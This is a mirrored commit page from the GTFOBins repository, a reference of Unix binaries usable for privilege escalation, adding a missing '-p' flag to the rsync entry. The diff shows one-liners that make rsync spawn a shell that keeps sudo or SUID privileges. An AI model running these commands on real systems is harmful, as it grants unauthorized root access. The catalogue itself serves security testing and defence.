mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 10:48:50 +01:00 
			
		
		
		
	Fix rsync issue #388 by adding missing -p flag
This commit is contained in:
		@@ -5,5 +5,5 @@ functions:
 | 
				
			|||||||
  sudo:
 | 
					  sudo:
 | 
				
			||||||
    - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
 | 
					    - code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
 | 
				
			||||||
  suid:
 | 
					  suid:
 | 
				
			||||||
    - code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
 | 
					    - code: ./rsync -e 'sh -p -c "sh -p 0<&2 1>&2"' 127.0.0.1:/dev/null
 | 
				
			||||||
---
 | 
					---
 | 
				
			||||||
 
 | 
				
			|||||||
		Reference in New Issue
	
	Block a user